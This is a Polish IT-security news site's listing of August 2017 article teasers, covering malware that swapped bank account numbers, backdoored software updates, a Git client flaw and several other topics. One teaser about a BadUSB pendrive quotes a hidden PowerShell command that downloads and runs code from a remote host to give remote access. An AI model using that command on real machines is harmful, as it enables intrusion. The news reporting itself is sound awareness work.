Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Aktualności

Podmiana numerów kont na wielką skalę – kilka milionów USD wyparowało

18 sierpnia 2017, 22:35 | W biegu | komentarzy 8

BBC opisuje garść ataków dotykających firmy spedycyjne (shipping companies), wśród których warto zwrócić na co najmniej jeden. Mianowicie omawiany jest przypadek instalacji malware w średniej wielkości firmie spedycyjnej. Malware wg cytowanego opisu przechwytywał e-maile z / do działu księgowego i podmieniał numery rachunków kont. Przykładowo, dostawca paliwa pisze maila z…

Czytaj dalej »

Obejście uwierzytelniania w Ubiquiti airMAX/airOS przy pomocy airControl web-UI

18 sierpnia 2017, 15:01 | W biegu | komentarze 3

Opublikowana została informacja o możliwości obejścia uwierzytelniania w Ubiquiti airMAX oraz Ubiquiti airOS, w przypadku, gdy wykorzystywany był interfejs airControl web-UI. Podatność wynika po części z ryzyka i trudności jakie wynikają z prób odwoływania się z poziomu aplikacji WWW do programów i skryptów powłoki systemowej. Niemałe znaczenie miało również wykorzystanie…

Czytaj dalej »

Malware w oficjalnych aktualizacjach – nowy trend?

17 sierpnia 2017, 16:36 | W biegu | komentarzy 8

Firma Proofpoint donosi o kolejnych rozszerzeniach do Chrome, które zostały przejęte. A bardziej precyzyjnie – przejęte zostały konta osób tworzących rozszerzenia, po czym do oficjalnego sklepu Google z rozszerzeniami została wgrana zainfekowana wersja. Pisaliśmy niedawno o historii z The Web Developer (ponad 1 000 000 instalacji), a Proofpoint wskazuje na kolejne zainfekowane rozszerzenia:…

Czytaj dalej »

rozwal.to premium – zapisy na bezpłatną wersję beta

16 sierpnia 2017, 21:30 | W biegu | komentarze 4

Pisaliśmy już wiele razy o naszym nowym projekcie, czyli rozwal.to premium. Co ma być tutaj w przeciwieństwie do „zwykłego” rozwal.to? Po pierwsze – dostępna teoria do każdej grupy zadań; będą tu też zadania mocno nietypowe – jak np. hackowanie WebSocketów czy zabawy z OAuth2.0 Po drugie – zadania, dla których…

Czytaj dalej »

Pendrive przejmujący komputer za ~30 złotych

16 sierpnia 2017, 20:28 | W biegu | komentarzy 14

Opis przygotowania pendrive, który po podłączeniu działa jak klawiatura. Klawiatura ta z kolei wpisuje zaprogramowaną wcześniej sekwencję klawiszy – np. uruchamia powershella i daje zdalny dostęp na docelowy komputer. Np. tak: Keyboard.println(„powershell.exe -nop -w hidden -c $C=new-object net.webclient;$C.proxy=[Net.WebRequest]::GetSystemWebProxy();$C.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $C.downloadstring(’http://1.2.3.4:8080/’);”); Keyboard.write(KEY_RETURN); Sercem projektu jest produkt „Adafruit Trinket – Mini Microcontroller” –…

Czytaj dalej »

Reklama na sekuraku

16 sierpnia 2017, 13:29 | W biegu | komentarze 3

Po 3,5 roku działalności sekuraka otwieramy się na zewnętrzną reklamę. Garść statystyk: W lipcu 2017r. zanotowaliśmy wejścia z około 225 000 unikalnych adresów IP (dane z analizy logów webserwera) Nasze profile śledzi około 34 000 osób (Facebook + Twitter + Wykop) Mamy zarejestrowanych około 6000 kont na siostrzanym serwisie –…

Czytaj dalej »

Wprowadzili exploita do DNA, który dał zdalne wykonanie kodu. Ale… zaraz, zaraz…

16 sierpnia 2017, 13:01 | W biegu | komentarze 2

Ostatnio media obiegła dość interesująca informacja o możliwości zsyntetyzowania takiego DNA, które da wykonanie kodu na maszynie, która służy do sekwencjonowania DNA  (czyli w pewnym uproszczeniu poznania ciągu liter – odpowiadającym czterem parom nukleotydowym – wchodzących w skład DNA). Autorzy piszą w swojej pracy tak: We demonstrate, for the first time, the…

Czytaj dalej »

Backdoor w oficjalnej aktualizacji oprogramowania wykorzystywanej przez IT na całym świecie

16 sierpnia 2017, 12:02 | Aktualności | 0 komentarzy
Backdoor w oficjalnej aktualizacji oprogramowania wykorzystywanej przez IT na całym świecie

Niepokoi kilka rzeczy: nie jest to przypadkowy kod wprowadzony przez roztargnionego programistę, tylko prawdziwy backdoor z krwi i kości, dający możliwość wykonywania kodu przez napastników backdoor znalazł się w oficjalnej aktualizacji kilku narzędzi dystrybuowanych przez firmę Netsarang znaleziono przynajmniej jedno złośliwe wykorzystanie backdoor-a (pytanie czy w reszcie miejsc w ogóle…

Czytaj dalej »

Jak analizować malware? Dwuczęściowy kurs

14 sierpnia 2017, 14:12 | W biegu | 1 komentarz

Jak w tytule. Mamy tu sporo danych o przygotowaniu środowiska, podstawach, analizie statycznej, dynamicznej czy szyfrowaniu. Nie zabrakło też informacji o tonie narzędzi oraz rozmaitych technikach używanych przez złośliwe oprogramowanie. Całość idealna jest dla osób chcących zacząć przygodę z tematem. –ms

Czytaj dalej »

Klient Git podatny na nieautoryzowane wykonanie kodu

11 sierpnia 2017, 16:11 | W biegu | 0 komentarzy

Przed wpadnięciem w wir weekendowych rozrywek zalecamy zweryfikować z jakiej wersji klienta Git korzystacie. Opublikowana została informacja o możliwości wykonania dowolnego polecenia w systemie m.in. podczas klonowania złośliwego repozytorium. Najprostszy wektor pozwalający na zweryfikowanie, czy nasza wersja klienta Git jest podatna to uruchomienie polecenia z Listingu nr 1 (wersja dla…

Czytaj dalej »

Ciekawostka: Ominięcie XSS Auditora wykorzystując funkcje Cloudflare

11 sierpnia 2017, 16:02 | Aktualności | 0 komentarzy
Ciekawostka: Ominięcie XSS Auditora wykorzystując funkcje Cloudflare

Standardowe biblioteki oraz funkcje JavaScript, które wykorzystuje i udostępnia Cloudflare można wykorzystać do ominięcia mechanizmu XSS Auditor w przypadku, gdy domena podpięta pod usługi Cloudflare podatna jest na Reflected XSS (Non-persistent XSS). Taką ciekawostką podzielił się Masato Kinugawa, specjalista bezpieczeństwa IT, znany z badań dotyczących podatności XSS jak i współorganizacji zawodów XSSMas Challenge.

Czytaj dalej »

Windows Defender Exploit Guard czyli EMET wbudowany w Windows

10 sierpnia 2017, 18:49 | W biegu | 0 komentarzy
Windows Defender Exploit Guard czyli EMET wbudowany w Windows

Pod koniec ubiegłego roku Microsoft ogłosił planowany koniec rozwoju EMET. Projekt miał na celu dostarczenie rozwiązania, które mogło zostać wykorzystane jako dodatkowa warstwa ochrony przed wykorzystywaniem luk bezpieczeństwa w oprogramowaniu, a co za tym idzie, zaatakowaniem całego systemu. Jedną z najważniejszych cech jaką charakteryzuje się EMET jest możliwość włączenia określonych…

Czytaj dalej »

Dostał $10 000 od Google za podmianę jednego nagłówka Header

10 sierpnia 2017, 18:38 | W biegu | 0 komentarzy

Wiecie ile warta jest taka informacja: curl -k „https://yaqs.googleplex.com” –resolve „yaqs.googleplex.com:443:172.217.28.180” ? 10 000$ USD – taką bowiem kwotę wypłaciło Google za zgłoszenie buga, który polegał na wysłaniu jednego requestu do serwera 172.217.28.180 z ustawionym nagłówkiem Host: yaqs.googleplex.com – o dziwo, badaczowi wyświetliła się wtedy strona Google z treścią oznaczoną jako Google…

Czytaj dalej »